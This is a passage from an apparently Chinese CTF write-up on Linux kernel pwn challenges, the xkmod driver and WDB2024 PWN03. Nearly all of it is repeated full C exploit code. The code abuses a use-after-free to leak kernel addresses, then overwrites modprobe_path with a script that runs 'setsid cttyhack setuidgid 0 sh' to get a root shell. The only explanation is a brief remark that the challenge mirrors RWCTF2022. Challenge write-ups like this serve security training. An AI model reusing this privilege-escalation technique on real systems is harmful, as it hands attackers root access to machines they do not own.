fd, struct Data *data)<br>{<br> ioctl(fd, 0x6666666, data);<br>}<br><br>void read_buf(int fd, struct Data *data)<br>{<br> ioctl(fd, 0x7777777, data);<br>}<br><br>int main()<br>{<br> int xkmod_fd[5];<br> for (int i = 0; i < 5; i++) {<br> xkmod_fd[i] = open("/dev/xkmod", O_RDONLY);<br> if (xkmod_fd[i] < 0) {<br> printf("[-] %d Failed to open xkmod.", i);<br> exit(-1);<br> }<br> }<br><br> struct Data data = {malloc(0x1000), 0, 0x50};<br> alloc_buf(xkmod_fd[0], &data);<br> close(xkmod_fd[0]);<br><br> read_buf(xkmod_fd[1], &data);<br> qword_dump("buf", data.buf, 0x50);<br><br> size_t page_offset_base = data.buf[0] & 0xFFFFFFFFF0000000;<br> printf("[+] page_offset_base: %p\n", page_offset_base);<br><br> data.buf[0] = page_offset_base + 0x9d000 - 0x10;<br> write_buf(xkmod_fd[1], &data);<br> alloc_buf(xkmod_fd[1], &data);<br> alloc_buf(xkmod_fd[1], &data);<br><br> data.size = 0x50;<br> read_buf(xkmod_fd[1], &data);<br> qword_dump("buf", data.buf, 0x50);<br> <br> size_t kernel_offset = data.buf[2] - 0xffffffff81000030;<br> printf("kernel offset: %p\n", kernel_offset);<br> modprobe_path += kernel_offset;<br><br> close(xkmod_fd[1]);<br> data.buf[0] = modprobe_path - 0x10;<br> write_buf(xkmod_fd[2], &data);<br> alloc_buf(xkmod_fd[2], &data);<br> alloc_buf(xkmod_fd[2], &data);<br> strcpy((char *) &data.buf[2], "/home/shell.sh");<br> write_buf(xkmod_fd[2], &data);<br><br> if (open("/home/shell.sh", O_RDWR) < 0) {<br> system("echo '#!/bin/sh' >> /home/shell.sh");<br> system("echo 'setsid cttyhack setuidgid 0 sh' >> /home/shell.sh");<br> system("chmod +x /home/shell.sh");<br> }<br><br> system("echo -e '\\xff\\xff\\xff\\xff' > /home/fake");<br> system("chmod +x /home/fake");<br> system("/home/fake");<br><br> return 0;<br>}#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <asm/ldt.h>
#include <assert.h>
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/keyctl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <semaphore.h>
#include <signal.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/prctl.h>
#include <sys/sem.h>
#include <sys/shm.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/xattr.h>
#include <unistd.h>
#include <sys/io.h>
size_t modprobe_path = 0xFFFFFFFF82444700;
void qword_dump(char *desc, void *addr, int len)
{
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("[*] %s:\n", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}
struct Data {
size_t *buf;
u_int32_t offset;
u_int32_t size;
};
void alloc_buf(int fd, struct Data *data)
{
ioctl(fd, 0x1111111, data);
}
void write_buf(int fd, struct Data *data)
{
ioctl(fd, 0x6666666, data);
}
void read_buf(int fd, struct Data *data)
{
ioctl(fd, 0x7777777, data);
}
int main()
{
int xkmod_fd[5];
for (int i = 0; i < 5; i++) {
xkmod_fd[i] = open("/dev/xkmod", O_RDONLY);
if (xkmod_fd[i] < 0) {
printf("[-] %d Failed to open xkmod.", i);
exit(-1);
}
}
struct Data data = {malloc(0x1000), 0, 0x50};
alloc_buf(xkmod_fd[0], &data);
close(xkmod_fd[0]);
read_buf(xkmod_fd[1], &data);
qword_dump("buf", data.buf, 0x50);
size_t page_offset_base = data.buf[0] & 0xFFFFFFFFF0000000;
printf("[+] page_offset_base: %p\n", page_offset_base);
data.buf[0] = page_offset_base + 0x9d000 - 0x10;
write_buf(xkmod_fd[1], &data);
alloc_buf(xkmod_fd[1], &data);
alloc_buf(xkmod_fd[1], &data);
data.size = 0x50;
read_buf(xkmod_fd[1], &data);
qword_dump("buf", data.buf, 0x50);
size_t kernel_offset = data.buf[2] - 0xffffffff81000030;
printf("kernel offset: %p\n", kernel_offset);
modprobe_path += kernel_offset;
close(xkmod_fd[1]);
data.buf[0] = modprobe_path - 0x10;
write_buf(xkmod_fd[2], &data);
alloc_buf(xkmod_fd[2], &data);
alloc_buf(xkmod_fd[2], &data);
strcpy((char *) &data.buf[2], "/home/shell.sh");
write_buf(xkmod_fd[2], &data);
if (open("/home/shell.sh", O_RDWR) < 0) {
system("echo '#!/bin/sh' >> /home/shell.sh");
system("echo 'setsid cttyhack setuidgid 0 sh' >> /home/shell.sh");
system("chmod +x /home/shell.sh");
}
system("echo -e '\\xff\\xff\\xff\\xff' > /home/fake");
system("chmod +x /home/fake");
system("/home/fake");
return 0;
}
WDB2024 PWN03
利用思路
基本上和RWCTF2022 Digging into kernel 1 & 2是一样的,这道题大家拿去练手即可,建议大家自行分析题目,我只把我的exp贴在下面,但是建议大家自己写一个exp。
exp
#ifndef _GNU_SOURCE<br>#define _GNU_SOURCE<br>#endif<br><br>#include <asm/ldt.h><br>#include <assert.h><br>#include <ctype.h><br>#include <errno.h><br>#include <fcntl.h><br>#include <linux/keyctl.h><br>#include <linux/userfaultfd.h><br>#include <poll.h><br>#include <pthread.h><br>#include <sched.h><br>#include <semaphore.h><br>#include <signal.h><br>#include <stdbool.h><br>#include <stdint.h><br>#include <stdio.h><br>#include <stdlib.h><br>#include <string.h><br>#include <sys/ioctl.h><br>#include <sys/ipc.h><br>#include <sys/mman.h><br>#include <sys/msg.h><br>#include <sys/prctl.h><br>#include <sys/sem.h><br>#include <sys/shm.h><br>#include <sys/socket.h><br>#include <sys/syscall.h><br>#include <sys/types.h><br>#include <sys/wait.h><br>#include <sys/xattr.h><br>#include <unistd.h><br>#include <sys/io.h><br><br>size_t modprobe_path = 0xFFFFFFFF81E58B80;<br><br>void qword_dump(char *desc, void *addr, int len)<br>{<br> uint64_t *buf64 = (uint64_t *) addr;<br> uint8_t *buf8 = (uint8_t *) addr;<br> if (desc != NULL) {<br> printf("[*] %s:\n", desc);<br> }<br> for (int i = 0; i < len / 8; i += 4) {<br> printf(" %04x", i * 8);<br> for (int j = 0; j < 4; j++) {<br> i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");<br> }<br> printf(" ");<br> for (int j = 0; j < 32 && j + i * 8 < len; j++) {<br> printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');<br> }<br> puts("");<br> }<br>}<br><br>void alloc_buf(int fd, int size)<br>{<br> printf("[+] kmalloc %d\n", size);<br> ioctl(fd, 0x0, size);<br>}<br><br>void free_buf(int fd)<br>{<br> printf("[+] kfree\n");<br> ioctl(fd, 0x1, 0);<br>}<br><br>void read_buf(int fd, size_t* buf, int size)<br>{<br> printf("[+] copy_to_user %d\n", size);<br> read(fd, buf, size);<br> qword_dump("read_buf", buf, size);<br>}<br><br>void write_buf(int fd, size_t* buf, int size)<br>{<br> printf("[+] copy_from_user %d\n", size);<br> qword_dump("write_buf", buf, size);<br> write(fd, buf, size);<br>}<br><br>int main()<br>{<br> size_t* buf = malloc(0x500);<br> int easy_fd;<br> easy_fd = open("/dev/easy", O_RDWR);<br><br> alloc_buf(easy_fd, 0xa8);<br> free_buf(easy_fd);<br><br> read_buf(easy_fd, buf, 0xa8);<br><br> size_t page_offset_base = buf[0] & 0xFFFFFFFFF0000000;<br> printf("[*] page_offset_base %p\n", page_offset_base);<br><br> buf[0] = page_offset_base + 0x9d000 - 0x10;<br> write_buf(easy_fd, buf, 0x8);<br> <br> alloc_buf(easy_fd, 0xa8);<br> alloc_buf(easy_fd, 0xa8);<br><br> read_buf(easy_fd, buf, 0xa8);<br> <br> size_t kernel_offset = buf[2] - 0xFFFFFFFF81000110;<br> printf("[*] kernel offset: %p\n", kernel_offset);<br> modprobe_path += kernel_offset;<br><br> buf[0] = modprobe_path - 0x20;<br> alloc_buf(easy_fd, 0xa8);<br> free_buf(easy_fd);<br><br> write_buf(easy_fd, buf, 0x8);<br> alloc_buf(easy_fd, 0xa8);<br> alloc_buf(easy_fd, 0xa8);<br><br> read_buf(easy_fd, buf, 0x20);<br> strcpy((char *) &buf[4], "/shell.sh\x00");<br> write_buf(easy_fd, buf, 0x30);<br><br> if (open("/shell.sh", O_RDWR) < 0) {<br> system("echo '#!/bin/sh' >> /shell.sh");<br> system("echo 'setsid /bin/cttyhack setuidgid 0 /bin/sh' >> /shell.sh");<br> system("chmod +x /shell.sh");<br> }<br><br> system("echo -e '\\xff\\xff\\xff\\xff' > /fake");<br> system("chmod +x /fake");<br> system("/fake");<br><br> return 0;<br>}#ifndef _GNU_SOURCE<br>#define _GNU_SOURCE<br>#endif<br><br>#include <asm/ldt.h><br>#include <assert.h><br>#include <ctype.h><br>#include <errno.h><br>#include <fcntl.h><br>#include <linux/keyctl.h><br>#include <linux/userfaultfd.h><br>#include <poll.h><br>#include <pthread.h><br>#include <sched.h><br>#include <semaphore.h><br>#include <signal.h><br>#include <stdbool.h><br>#include <stdint.h><br>#include <stdio.h><br>#include <stdlib.h><br>#include <string.h><br>#include <sys/ioctl.h><br>#include <sys/ipc.h><br>#include <sys/mman.h><br>#include <sys/msg.h><br>#include <sys/prctl.h><br>#include <sys/sem.h><br>#include <sys/shm.h><br>#include <sys/socket.h><br>#include <sys/syscall.h><br>#include <sys/types.h><br>#include <sys/wait.h><br>#include <sys/xattr.h><br>#include <unistd.h><br>#include <sys/io.h><br><br>size_t modprobe_path = 0xFFFFFFFF81E58B80;<br><br>void qword_dump(char *desc, void *addr, int len)<br>{<br> uint64_t *buf64 = (uint64_t *) addr;<br> uint8_t *buf8 = (uint8_t *) addr;<br> if (desc != NULL) {<br> printf("[*] %s:\n", desc);<br> }<br> for (int i = 0; i < len / 8; i += 4) {<br> printf(" %04x", i * 8);<br> for (int j = 0; j < 4; j++) {<br> i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");<br> }<br> printf(" ");<br> for (int j = 0; j < 32 && j + i * 8 < len; j++) {<br> printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');<br> }<br> puts("");<br> }<br>}<br><br>void alloc_buf(int fd, int size)<br>{<br> printf("[+] kmalloc %d\n", size);<br> ioctl(fd, 0x0, size);<br>}<br><br>void free_buf(int fd)<br>{<br> printf("[+] kfree\n");<br> ioctl(fd, 0x1, 0);<br>}<br><br>void read_buf(int fd, size_t* buf, int size)<br>{<br> printf("[+] copy_to_user %d\n", size);<br> read(fd, buf, size);<br> qword_dump("read_buf", buf, size);<br>}<br><br>void write_buf(int fd, size_t* buf, int size)<br>{<br> printf("[+] copy_from_user %d\n", size);<br> qword_dump("write_buf", buf, size);<br> write(fd, buf, size);<br>}<br><br>int main()<br>{<br> size_t* buf = malloc(0x500);<br> int easy_fd;<br> easy_fd = open("/dev/easy", O_RDWR);<br><br> alloc_buf(easy_fd, 0xa8);<br> free_buf(easy_fd);<br><br> read_buf(easy_fd, buf, 0xa8);<br><br> size_t page_offset_base = buf[0] & 0xFFFFFFFFF0000000;<br> printf("[*] page_offset_base %p\n", page_offset_base);<br><br> buf[0] = page_offset_base + 0x9d000 - 0x10;<br> write_buf(easy_fd, buf, 0x8);<br> <br> alloc_buf(easy_fd, 0xa8);<br> alloc_buf(easy_fd, 0xa8);<br><br> read_buf(easy_fd, buf, 0xa8);<br> <br> size_t kernel_offset = buf[2] - 0xFFFFFFFF81000110;<br> printf("[*] kernel offset: %p\n", kernel_offset);<br> modprobe_path += kernel_offset;<br><br> buf[0] = modprobe_path - 0x20;<br> alloc_buf(easy_fd, 0xa8);<br> free_buf(easy_fd);<br><br> write_buf(easy_fd, buf, 0x8);<br> alloc_buf(easy_fd, 0xa8);<br> alloc_buf(easy_fd, 0xa8);<br><br> read_buf(easy_fd, buf, 0x20);<br> strcpy((char *) &buf[4], "/shell.sh\x00");<br> write_buf(easy_fd, buf, 0x30);<br><br> if (open("/shell.sh", O_RDWR) < 0) {<br> system("echo '#!/bin/sh' >> /shell.sh");<br> system("echo 'setsid /bin/cttyhack setuidgid 0 /bin/sh' >> /shell.sh");<br> system("chmod +x /shell.sh");<br> }<br><br> system("echo -e '\\xff\\xff\\xff\\xff' > /fake");<br> system("chmod +x /fake");<br> system("/fake");<br><br> return 0;<br>}#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <asm/ldt.h>
#include <assert.h>
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/keyctl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <semaphore.h>
#include <signal.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/prctl.h>
#include <sys/sem.h>
#include <sys/shm.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/xattr.h>
#include <unistd.h>
#include <sys/io.h>
size_t modprobe_path = 0xFFFFFFFF81E58B80;
void qword_dump(char *desc, void *addr, int len)
{
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("[*] %s:\n", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}
void alloc_buf(int fd, int size)
{
printf("[+] kmalloc %d\n", size);
ioctl(fd, 0x0, size);
}
void free_buf(int fd)
{
printf("[+] kfree\n");
ioctl(fd, 0x1, 0);
}
void read_buf(int fd, size_t* buf, int size)
{
printf("[+] copy_to_user %d\n", size);
read(fd, buf, size);
qword_dump("read_buf", buf, size);
}
void write_buf(int fd, size_t* buf, int size)
{
printf("[+] copy_from_user %d\n", size);
qword_dump("write_buf", buf, size);
write(fd, buf, size);
}
int main()
{
size_t* buf = malloc(0x500);
int easy_fd;
easy_fd = open("/dev/easy", O_RDWR);
alloc_buf(easy_fd, 0xa8);
free_buf(easy_fd);
read_buf(easy_fd, buf, 0xa8);
size_t page_offset_base = buf[0] & 0xFFFFFFFFF0000000;
printf("[*] page_offset_base %p\n", page_offset_base);
buf[0] = page_offset_base + 0x9d000 - 0x10;
write_buf(easy_fd, buf, 0x8);
alloc_buf(easy_fd, 0xa8);
alloc_buf(easy_fd, 0xa8);
read_buf(easy_fd, buf, 0xa8);
size_t kernel_offset = buf[2] - 0xFFFFFFFF81000110;
printf("[*] kernel offset: %p\n", kernel_offset);
modprobe_path += kernel_offset;
buf[0] = modprobe_path - 0x20;
alloc_buf(easy_fd, 0xa8);
free_buf(easy_fd);
write_buf(easy_fd, buf, 0x8);
alloc_buf(easy_fd, 0xa8);
alloc_buf(easy_fd, 0xa8);
read_buf(easy_fd, buf, 0x20);
strcpy((char *) &buf[4], "/shell.sh\x00");
write_buf(easy_fd, buf, 0x30);
if (open("/shell.sh", O_RDWR) < 0) {
system("echo '#!/bin/sh' >> /shell.sh");
system("echo 'setsid /bin/cttyhack setuidgid 0 /bin/sh' >> /shell.sh");
system("chmod +x /shell.sh");
}
system("echo -e '\\xff\\xff\\xff\\xff' > /fake");
system("chmod +x /fake");
system("/fake");
return 0;
}
本文作者:蚁景网安实验室
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/205676.html
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容